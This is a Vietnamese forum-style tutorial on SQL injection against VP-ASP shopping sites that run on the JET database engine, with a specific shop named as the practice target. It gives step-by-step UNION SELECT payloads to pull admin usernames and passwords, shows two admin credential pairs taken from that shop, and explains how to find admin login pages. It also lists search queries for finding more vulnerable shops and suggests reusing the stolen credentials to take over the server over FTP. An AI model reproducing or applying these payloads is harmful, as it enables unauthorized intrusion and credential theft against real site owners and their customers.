Hack các shop jetdatabase

Đây là một ví dụ , bạn có thể thực hành ngay tại shop này
http://www.treasureshidden.com/shopp...ucts.asp?cat=9
bạn thêm vào sau 1 dấu nháy đơn '
http://www.treasureshidden.com/shopping/sh....asp?cat=9'
ok báo lỗi rồi
9' Microsoft JET Database Engine error '80040e14' Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like '9%' and hide=0 order by specialoffer desc,cname'. /shop$db.asp, line 912
Bạn chú ý chỗ này nhé -----------> Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like '9%' and hide=0 order by specialoffer desc,cname'
Khi nó báo như vậy thì ta sẽ dùng union ( bạn giữ nguyên dấu ' nhé )
Câu lệnh như sau :
union select 1 from tbluser"having 1=1--sp_password
----> http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1 from tbluser"having 1=1--sp_password
-------------%--------------chú thích-------------%----------------
Nếu nó báo thế này hoặc tương tự )
Microsoft JET Database Engine error '80040e14' Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like '9'%'union select 1 from tbluser"having 1=1--sp_password and hide=0 order by specialoffer desc,cname'. /shop$db.asp, line 912
Bạn thử thay id bằng cat , thay cat bằng id hoặc xoá dấu ' xem sao
-------------------------------------------------------------------------------------
Tiếp tục nhé
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1 from tbluser"having 1=1--sp_password
Khi nó báo thế này là được rồi
Microsoft JET Database Engine error '80040e14' The number of columns in the two selected tables or queries of a union query do not match. /shop$db.asp, line 912
Lỗi vừa rồi nói rằng : có tồn tại giá trị column chứa thông tin admin
bạn cứ tiếp tục thêm số vào nhé
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1,2 from tbluser"having 1=1--sp_password
nó vẫn báo như vậy
Microsoft JET Database Engine error '80040e14' The number of columns in the two selected tables or queries of a union query do not match. /shop$db.asp, line 912
ta cứ tiếp tục như vậy
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1,2,3 from tbluser"having 1=1--sp_password
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1,2,3,4 from tbluser"having 1=1--sp_password
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1,2,3,4,5 from tbluser"having 1=1--sp_password
.......................
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7 from tbluser"having 1=1--sp_password
Cho đến khi có 1 cái bảng đẹp đẹp như sau ( ở đây là số 37 )
3
click to see more422

18Please review these other products:
----------------------------Chú thích-----------------------------
Kinh nghiệm qua nhiều lần hack của tôi là bạn nên xem line để thêm số cho nhanh . Ví dụ như ở shop này line là 912 -------> /shop$db.asp, line 912 , với line là 912 thường thì bạn phải thêm đến 37 . Còn một số nữa :
line 467 -----> thêm đến47
line 468 ------> thêm 47
line 469 -------> thêm 48
còn lại bạn tự tìm hiểu nha.Nếu không nhớ line thì bạn cứ thử 1 trong các số thường gặp sau : 34 , 37 , 47 , 48 ,54 , 83 , 84 ,92 ......( Thông thường tôi chỉ thêm đến 84 là hết kiên nhẫn nổi ) nếu bạn kiên trì thì nên thêm từng số cho chắc ăn () . Tiếp nhé
-------------------------------------------------------------------------
Bây giờ chúng ta bắt đầu lấy user and pass:• fldusername : thay cho số 3 , hay 4, hay 22 tuỳ bạn• fldpassword : thay cho số 3 , hay 4, hay 22 tuỳ bạn ( fldusername và fldpassword là tên của 2 column trong tbluser ) ,Ở đây tôi lần lượt thay vào số 3 và số 4
Code
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1,2,fldusername,fldpassword,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37 from tbluser"having 1=1--sp_password
ok nó sẽ báo như vầy :
admin
click to see moreadmin32612 22

18Please review these other products:
-------------------------------
harvey
click to see moreboha216322

18Please review these other products:
ok shop này có 2 admin + admin pass : admin32612
+ harvey pass: boha2163
Trong trường hợp nó chỉ có thế này
3
click to see more


Please review these other products:
bạn chỉ có thể thay vào số 3 mà thôi vậy ta sẽ dùng câu lệnh như sau
union select 1,2, fldusername%2b'/'%2bfldpassword,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37 from tbluser"having 1=1--sp_password
cái này tôi không giải thích thêm , chắc bạn hiểu rồi > OK
http://www.treasureshidden.com/shopping/sh....asp?cat=9'
Việc còn lại là tìm link admin
ta cứ thử 2 link này xem
http://www.treasureshidden.com/shopping/shopadmin.asp
http://www.treasureshidden.com/shopping/shopadmin1.asp
Nếu link admin ko phải như vậy, thi bạn dùng câu lệnh sau :
union select 1,2,fieldvalue,,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37 from configuration"having 1=1--sp_password
fieldvalue và configuration là gì thì bạn hiểu rồi không nói nữa. Câu lệnh này sẽ cho ra rất nhiều kết quả
bạn cứ view hết từng trang (thường có 10 trang ) thu thập các link có đuôi .asp rồi thay vào thử xem có phải link admin ko
-------------<%>-------------<%>------------------------------------------
Ngoài ra tôi xin trích thêm bài của lão vietcuongconan ( tôi thường làm theo kiểu này )
shopdisplayproducts.asp?id=1'lỗi ok! chúng ta thường sài một câu truy vấn để lấy thông tin:
CODE%20union%20select%201%20from%20"table"%27
"union select 1 from "table"'
theo kinh nghiệm tôi rút ra được một điều. đó là chúng ta có thễ dựa vào số linemà đoán số column
CODE
line191 -- 56line184 -- 47,43,53line188 -- 53,56line191 -- 48line185 -- 86,43line202 -- 84,91line208 -- 48,57line64 -- 53line211,187 -- 43line59 -- 70........
sơ bộ vậy thôi.......( các pác cũng có thể xài tool wis and wed của dora để hack....nhưng mình thì kông sài tool để hack mời các bạn tiếp)
chúng ta phải thêm đúng số column thì mới lấy thông tin được......trong trường hợp chúng ta thêm số hoài mà không thấy cái bảng nào ra cả.....vậy phải làm sao đây.....
uh. vậy là nó đã fix!bó tay sao.......không
Cách 1:các bạn đang ở file shopdisplayproducts.aspbây giờ chuyển sang fileshoptellafriend.aspshopexd.asp.......ok!tiếp tụcvd:shoptellafriend.aspline cũa nó là: 184 --> sô 47tiếp tục hack
CODE
shoptellafriend.asp?id=1%20union%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 ,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser %27

nó ra một cái bảncó số 3hehe!lấy user vào pass nào
CODE
shoptellafriend.asp?id=1%20union%20select%201,2,fl dusername%2b'/'% 2bfldpassword,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20t bluser%27
song xuôi, lấy link login nào.
CODEshoptellafriend.asp?id=1%20union%20select%201, 2,fi eldname%2b'/'% 2bfieldvalue,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,2
8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47%20from%20configuration%27
oach! sao chả thấy gì hết vậy..........hixhix....khó rồi đây........bó tay sao.
bầy giờ chúng ta so sánh nhé.nếu ở file shopdisplayproducts.asp thì nó sẽ đưa ra kết quả cho chúng ta...ở ngay hàng đâu tiên thì bị bỏ trống.và thông tin xuất hiện ở hàng thứ 2vậy cái mà chúng ta vừa lấy được là cái hàng đầu tiên (hơi khó hiểu phải không)vậy chúng ta chỉ cần đưa cái link login về hàng 1 bằng cách thay số 1 bằng
CODEfieldname='xadminpage'
------>shoptellafriend.asp?id=1 union select fieldname='xadminpage',2,fieldname%2b'/'% 2bfieldvalue,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47 from configuration'
ở file shopexd.asp cũng như vậy....
----------------------<%>---------------<%>-----------------------
Một số kinh nghiệm về hack shop :
_ Khi lấy được user/pass của điều hành cần dùng nó để đăng nhập server với giao thức ftp nếu "may mắn" (<----lão hackerjp nói thế ()) bạn có thể làm chủ server và không cần phải phí công nhiều trong khi hack.
_ Có một số trường hợp, site bị lỗi Injectjon nhưng hiện trang báo lỗi (khi ta thêm dấu '): The page cannot bedisplayed, bạn cần chú ý phía bên dưới nó vẫn báo lỗi đấy._ Khi hack shop bạn nên xoay nó theo nhiều chiều : thay id bằng cat , để nguyên dấu ' hoặc xoá nó đi khi ta query.........
_Khi search shop bạn cần cố gắng tìm cách search sao cho thật hiệu quả , một số từ khoá khác mà bạn cũng nên thử : VP ASP shopping
shop products
intext:"vp-asp shopping" inurl :".asp?id="
intext:"products" inurl:".asp?id="
và còn nhiều nữa bạn tự tìm hiểu thêm.
_ Tut này chỉ giúp bạn hack được những shop 1 pass ( tuy là 1 pass nhưng còn hàng triệu shop như vậy ) (cố gắng mà search)
_ Với những shop 2 pass , thực sự nếu bạn hiểu rõ những gì tôi nói ở trên , thì việc hack pass 2 ko khó...chúc may mắn ()
Hack vui vẻ nha